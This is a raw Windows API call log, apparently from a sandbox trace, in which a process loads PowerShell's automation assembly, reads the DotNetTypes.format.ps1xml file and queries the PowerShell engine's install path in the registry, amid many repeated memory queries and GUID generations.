	[0399.300] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0399.660] VirtualQuery (in: lpAddress=0x26bbe0, lpBuffer=0x26caa0, dwLength=0x30 | out: lpBuffer=0x26caa0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0399.661] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0xb7b495eb, Data2=0x43ee, Data3=0x4ef1, Data4=([0]=0x88, [1]=0xb, [2]=0xd9, [3]=0x56, [4]=0xea, [5]=0xba, [6]=0xa, [7]=0x72))) returned 0x0
	[0399.662] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x4f2c2865, Data2=0xb1d5, Data3=0x4798, Data4=([0]=0x84, [1]=0xeb, [2]=0x2f, [3]=0x62, [4]=0x82, [5]=0xe3, [6]=0xce, [7]=0xf7))) returned 0x0
	[0399.662] VirtualQuery (in: lpAddress=0x26bd90, lpBuffer=0x26cc50, dwLength=0x30 | out: lpBuffer=0x26cc50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0399.663] VirtualQuery (in: lpAddress=0x26bd90, lpBuffer=0x26cc50, dwLength=0x30 | out: lpBuffer=0x26cc50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0399.664] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x49f638d6, Data2=0x56b8, Data3=0x43f2, Data4=([0]=0x83, [1]=0x31, [2]=0xe9, [3]=0xa3, [4]=0xfa, [5]=0xaa, [6]=0xd0, [7]=0x8a))) returned 0x0
	[0399.666] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0xbb1562ec, Data2=0xd0b5, Data3=0x448a, Data4=([0]=0xb6, [1]=0x87, [2]=0x14, [3]=0x5a, [4]=0x47, [5]=0xb2, [6]=0x91, [7]=0x86))) returned 0x0
	[0399.666] VirtualQuery (in: lpAddress=0x26bfe0, lpBuffer=0x26cea0, dwLength=0x30 | out: lpBuffer=0x26cea0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0399.667] VirtualQuery (in: lpAddress=0x26bd20, lpBuffer=0x26cbe0, dwLength=0x30 | out: lpBuffer=0x26cbe0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0399.667] VirtualQuery (in: lpAddress=0x26bd20, lpBuffer=0x26cbe0, dwLength=0x30 | out: lpBuffer=0x26cbe0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0399.668] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x480e5a8f, Data2=0x2e1, Data3=0x4588, Data4=([0]=0x86, [1]=0x33, [2]=0xcb, [3]=0x1a, [4]=0x45, [5]=0x5b, [6]=0xc7, [7]=0xf))) returned 0x0
	[0399.668] VirtualQuery (in: lpAddress=0x26bfe0, lpBuffer=0x26cea0, dwLength=0x30 | out: lpBuffer=0x26cea0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0399.668] VirtualQuery (in: lpAddress=0x26be00, lpBuffer=0x26ccc0, dwLength=0x30 | out: lpBuffer=0x26ccc0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0399.668] VirtualQuery (in: lpAddress=0x26b650, lpBuffer=0x26c510, dwLength=0x30 | out: lpBuffer=0x26c510*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0399.668] VirtualQuery (in: lpAddress=0x26b650, lpBuffer=0x26c510, dwLength=0x30 | out: lpBuffer=0x26c510*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0399.668] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0xc83bc35a, Data2=0xc1d7, Data3=0x42c8, Data4=([0]=0xb9, [1]=0x3, [2]=0xde, [3]=0x9b, [4]=0xea, [5]=0x5a, [6]=0x12, [7]=0xd))) returned 0x0
	[0399.669] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x6657243e, Data2=0x6edd, Data3=0x4b5d, Data4=([0]=0xa1, [1]=0x32, [2]=0x60, [3]=0x1a, [4]=0x77, [5]=0xff, [6]=0xd9, [7]=0xdb))) returned 0x0
	[0399.669] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0399.669] SetErrorMode (uMode=0x1) returned 0x1
	[0399.669] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300
	[0399.669] GetFileType (hFile=0x300) returned 0x1
	[0399.669] SetErrorMode (uMode=0x1) returned 0x1
	[0399.669] GetFileType (hFile=0x300) returned 0x1
	[0399.669] ReadFile (in: hFile=0x300, lpBuffer=0x36d8380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x36d8380*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0399.670] ReadFile (in: hFile=0x300, lpBuffer=0x36d8380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x36d8380*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0399.670] ReadFile (in: hFile=0x300, lpBuffer=0x36d8380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x36d8380*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0399.670] ReadFile (in: hFile=0x300, lpBuffer=0x36d8380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x36d8380*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.135] ReadFile (in: hFile=0x300, lpBuffer=0x36d8380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x36d8380*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.135] ReadFile (in: hFile=0x300, lpBuffer=0x36d8380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x36d8380*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.135] ReadFile (in: hFile=0x300, lpBuffer=0x36d8380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x36d8380*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.135] ReadFile (in: hFile=0x300, lpBuffer=0x36d8380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x36d8380*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.136] ReadFile (in: hFile=0x300, lpBuffer=0x36d8380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x36d8380*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.136] ReadFile (in: hFile=0x300, lpBuffer=0x36d8380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x36d8380*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.136] ReadFile (in: hFile=0x300, lpBuffer=0x36d8380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x36d8380*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.137] ReadFile (in: hFile=0x300, lpBuffer=0x36d8380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x36d8380*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.137] ReadFile (in: hFile=0x300, lpBuffer=0x36d8380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x36d8380*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.137] ReadFile (in: hFile=0x300, lpBuffer=0x36d8380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x36d8380*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.137] ReadFile (in: hFile=0x300, lpBuffer=0x36d8380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x36d8380*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.137] ReadFile (in: hFile=0x300, lpBuffer=0x36d8380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x36d8380*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.138] ReadFile (in: hFile=0x300, lpBuffer=0x36d8380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x36d8380*, lpNumberOfBytesRead=0x26d0b8*=0x1000, lpOverlapped=0x0) returned 1
	[0400.139] ReadFile (in: hFile=0x300, lpBuffer=0x36d8380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x36d8380*, lpNumberOfBytesRead=0x26d0b8*=0xbce, lpOverlapped=0x0) returned 1
	[0400.139] ReadFile (in: hFile=0x300, lpBuffer=0x36d7ab6, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x36d7ab6*, lpNumberOfBytesRead=0x26d0b8*=0x0, lpOverlapped=0x0) returned 1
	[0400.139] ReadFile (in: hFile=0x300, lpBuffer=0x36d8380, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d0b8, lpOverlapped=0x0 | out: lpBuffer=0x36d8380*, lpNumberOfBytesRead=0x26d0b8*=0x0, lpOverlapped=0x0) returned 1
	[0400.139] CloseHandle (hObject=0x300) returned 1
	[0400.139] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0400.139] SetErrorMode (uMode=0x1) returned 0x1
	[0400.139] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d060 | out: lpFileInformation=0x26d060*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0400.140] SetErrorMode (uMode=0x1) returned 0x1
	[0400.140] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0400.140] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d148 | out: phkResult=0x26d148*=0x300) returned 0x0
	[0400.140] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d0cc, lpData=0x0, lpcbData=0x26d0c8*=0x0 | out: lpType=0x26d0cc*=0x1, lpData=0x0, lpcbData=0x26d0c8*=0x56) returned 0x0
	[0400.140] CoTaskMemAlloc (cb=0x5a) returned 0x47ed70
	[0400.140] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d09c, lpData=0x47ed70, lpcbData=0x26d098*=0x56 | out: lpType=0x26d09c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d098*=0x56) returned 0x0
	[0400.140] CoTaskMemFree (pv=0x47ed70) 
	[0400.140] RegCloseKey (hKey=0x300) returned 0x0
	[0400.140] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0400.140] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0400.144] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0xfd3e582c, Data2=0xe98d, Data3=0x4c0e, Data4=([0]=0x88, [1]=0xd4, [2]=0x5, [3]=0x90, [4]=0x47, [5]=0x42, [6]=0xb9, [7]=0xf1))) returned 0x0
	[0400.145] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x9782ace9, Data2=0x27d, Data3=0x4376, Data4=([0]=0x89, [1]=0x60, [2]=0x64, [3]=0x27, [4]=0x63, [5]=0x4c, [6]=0x6e, [7]=0x47))) returned 0x0
	[0400.146] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0xfdb10b20, Data2=0xee24, Data3=0x4596, Data4=([0]=0xac, [1]=0x29, [2]=0xd1, [3]=0x79, [4]=0x3b, [5]=0x50, [6]=0x2, [7]=0x74))) returned 0x0
	[0400.146] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0xaa19727e, Data2=0xcd6b, Data3=0x48cb, Data4=([0]=0xa7, [1]=0xb, [2]=0x70, [3]=0x6e, [4]=0x6, [5]=0x22, [6]=0xde, [7]=0xc1))) returned 0x0
	[0400.147] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0xe409a58a, Data2=0xe2c9, Data3=0x4efd, Data4=([0]=0xb0, [1]=0x11, [2]=0x1e, [3]=0x4a, [4]=0x52, [5]=0xeb, [6]=0xda, [7]=0x8e))) returned 0x0
	[0400.147] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0xc3358a70, Data2=0x7cf, Data3=0x4e0b, Data4=([0]=0x99, [1]=0x1e, [2]=0x72, [3]=0xbc, [4]=0xf5, [5]=0x58, [6]=0x89, [7]=0x90))) returned 0x0
	[0400.148] VirtualQuery (in: lpAddress=0x26bd20, lpBuffer=0x26cbe0, dwLength=0x30 | out: lpBuffer=0x26cbe0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0400.149] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0xd39c32f4, Data2=0x2682, Data3=0x4f9d, Data4=([0]=0xb2, [1]=0xd6, [2]=0x34, [3]=0xe0, [4]=0xf, [5]=0xfe, [6]=0x89, [7]=0x6d))) returned 0x0
	[0400.149] VirtualQuery (in: lpAddress=0x26bd20, lpBuffer=0x26cbe0, dwLength=0x30 | out: lpBuffer=0x26cbe0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0400.150] VirtualQuery (in: lpAddress=0x26bd20, lpBuffer=0x26cbe0, dwLength=0x30 | out: lpBuffer=0x26cbe0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0400.151] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0xc0fa74d5, Data2=0xffef, Data3=0x4ad0, Data4=([0]=0xaf, [1]=0x48, [2]=0x53, [3]=0x82, [4]=0x39, [5]=0xe7, [6]=0xcd, [7]=0x64))) returned 0x0
	[0400.151] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x87f78d8c, Data2=0x6c92, Data3=0x4ca6, Data4=([0]=0x88, [1]=0x4e, [2]=0xb1, [3]=0xac, [4]=0x15, [5]=0x66, [6]=0x74, [7]=0xcc))) returned 0x0
	[0400.152] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x32ced253, Data2=0x254b, Data3=0x462b, Data4=([0]=0xa3, [1]=0x23, [2]=0xaf, [3]=0x76, [4]=0xc9, [5]=0x86, [6]=0x8b, [7]=0xfd))) returned 0x0
	[0400.152] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x8d4b553a, Data2=0xd6fb, Data3=0x49b9, Data4=([0]=0x8a, [1]=0x8a, [2]=0xf5, [3]=0x0, [4]=0x0, [5]=0x2a, [6]=0x1b, [7]=0x64))) returned 0x0
	[0400.152] VirtualQuery (in: lpAddress=0x26bd20, lpBuffer=0x26cbe0, dwLength=0x30 | out: lpBuffer=0x26cbe0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0400.152] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0xb4e11a9d, Data2=0xa2d8, Data3=0x44ff, Data4=([0]=0xa0, [1]=0x59, [2]=0xe, [3]=0x58, [4]=0x14, [5]=0xe6, [6]=0x84, [7]=0x47))) returned 0x0
	[0400.152] VirtualQuery (in: lpAddress=0x26bd20, lpBuffer=0x26cbe0, dwLength=0x30 | out: lpBuffer=0x26cbe0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0400.152] VirtualQuery (in: lpAddress=0x26bd20, lpBuffer=0x26cbe0, dwLength=0x30 | out: lpBuffer=0x26cbe0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0400.153] VirtualQuery (in: lpAddress=0x26bd20, lpBuffer=0x26cbe0, dwLength=0x30 | out: lpBuffer=0x26cbe0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0400.153] VirtualQuery (in: lpAddress=0x26bd20, lpBuffer=0x26cbe0, dwLength=0x30 | out: lpBuffer=0x26cbe0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0400.153] VirtualQuery (in: lpAddress=0x26bd20, lpBuffer=0x26cbe0, dwLength=0x30 | out: lpBuffer=0x26cbe0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0400.153] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x6be314f4, Data2=0x7611, Data3=0x481a, Data4=([0]=0xa9, [1]=0xd0, [2]=0x9, [3]=0x2d, [4]=0x66, [5]=0x71, [6]=0xca, [7]=0x12))) returned 0x0
	[0400.153] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0xbce44a16, Data2=0x5cc3, Data3=0x41c3, Data4=([0]=0x94, [1]=0x88, [2]=0x76, [3]=0x50, [4]=0xed, [5]=0xbd, [6]=0xe8, [7]=0x84))) returned 0x0
	[0400.153] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x4efbeaa7, Data2=0x2fa3, Data3=0x4a47, Data4=([0]=0xa7, [1]=0xea, [2]=0x34, [3]=0x94, [4]=0x3c, [5]=0x8c, [6]=0x63, [7]=0xe4))) returned 0x0
	[0400.154] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0xfe90d013, Data2=0xe8a6, Data3=0x4997, Data4=([0]=0x9e, [1]=0xf5, [2]=0x94, [3]=0x43, [4]=0x0, [5]=0xa6, [6]=0x87, [7]=0xa9))) returned 0x0
	[0400.154] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x7d975917, Data2=0x69f2, Data3=0x4ed9, Data4=([0]=0xa3, [1]=0x34, [2]=0xf5, [3]=0xb6, [4]=0x68, [5]=0x64, [6]=0xbc, [7]=0x31))) returned 0x0
	[0400.154] VirtualQuery (in: lpAddress=0x26bfe0, lpBuffer=0x26cea0, dwLength=0x30 | out: lpBuffer=0x26cea0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0400.154] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x2fa97e09, Data2=0x1fe8, Data3=0x4576, Data4=([0]=0xa3, [1]=0x85, [2]=0x6b, [3]=0xb2, [4]=0xf9, [5]=0xb3, [6]=0x4b, [7]=0x6c))) returned 0x0
	[0400.154] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x3400b7fc, Data2=0x6b0, Data3=0x46ea, Data4=([0]=0xb9, [1]=0xb2, [2]=0xfe, [3]=0xeb, [4]=0x59, [5]=0x8b, [6]=0xa0, [7]=0x90))) returned 0x0
	[0400.154] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0xd7ce4643, Data2=0xc42d, Data3=0x4656, Data4=([0]=0xac, [1]=0x57, [2]=0xe3, [3]=0x93, [4]=0x62, [5]=0x9a, [6]=0xd1, [7]=0x41))) returned 0x0
	[0400.155] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x7fe7ce0b, Data2=0xdbb1, Data3=0x40b6, Data4=([0]=0xb9, [1]=0x5, [2]=0xbf, [3]=0x64, [4]=0x38, [5]=0x5e, [6]=0x23, [7]=0x69))) returned 0x0
	[0400.155] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0xdd922c66, Data2=0x2c13, Data3=0x43c1, Data4=([0]=0xb3, [1]=0x77, [2]=0x34, [3]=0xca, [4]=0xa4, [5]=0x4a, [6]=0x54, [7]=0x3c))) returned 0x0
	[0400.155] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x51aade56, Data2=0xc60d, Data3=0x410f, Data4=([0]=0xaf, [1]=0x90, [2]=0x20, [3]=0xd6, [4]=0x86, [5]=0x4c, [6]=0xa7, [7]=0x7d))) returned 0x0
	[0400.155] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x8143abc7, Data2=0x9fcd, Data3=0x43b5, Data4=([0]=0x88, [1]=0x6d, [2]=0x79, [3]=0xbd, [4]=0x2d, [5]=0xd2, [6]=0x26, [7]=0xa1))) returned 0x0
	[0400.155] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x1e65f8ae, Data2=0x2907, Data3=0x4b28, Data4=([0]=0xa5, [1]=0xda, [2]=0x8f, [3]=0x58, [4]=0xdb, [5]=0x2d, [6]=0x6d, [7]=0x9f))) returned 0x0
	[0400.155] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x25e8ae9e, Data2=0x2d43, Data3=0x4cd1, Data4=([0]=0xa4, [1]=0x56, [2]=0x64, [3]=0xea, [4]=0x8c, [5]=0xbf, [6]=0x4f, [7]=0x18))) returned 0x0
	[0400.155] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x2ab94d0e, Data2=0x848a, Data3=0x4c39, Data4=([0]=0xa1, [1]=0xf1, [2]=0x33, [3]=0x53, [4]=0xce, [5]=0x93, [6]=0x73, [7]=0x84))) returned 0x0
	[0400.156] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0xf277cf98, Data2=0xe9ae, Data3=0x4cb4, Data4=([0]=0x9e, [1]=0xf0, [2]=0xf4, [3]=0x69, [4]=0x52, [5]=0x67, [6]=0xf0, [7]=0x3c))) returned 0x0
	[0400.156] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0xacc9992, Data2=0x377a, Data3=0x4fc1, Data4=([0]=0xb5, [1]=0x55, [2]=0x75, [3]=0xd7, [4]=0x9a, [5]=0x3c, [6]=0xf, [7]=0xf6))) returned 0x0
	[0400.156] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x5396d019, Data2=0x241f, Data3=0x4e73, Data4=([0]=0xb3, [1]=0x2f, [2]=0x23, [3]=0x59, [4]=0x94, [5]=0x73, [6]=0xde, [7]=0xfe))) returned 0x0
	[0400.156] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x6cc80638, Data2=0xdbb6, Data3=0x4b0a, Data4=([0]=0x9b, [1]=0xbd, [2]=0xc2, [3]=0x4c, [4]=0x45, [5]=0x3b, [6]=0x2c, [7]=0x5f))) returned 0x0
	[0400.156] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x36eebba0, Data2=0x2cba, Data3=0x4aa4, Data4=([0]=0xb8, [1]=0x9c, [2]=0xa, [3]=0xd1, [4]=0x3d, [5]=0x9a, [6]=0xf4, [7]=0xa4))) returned 0x0
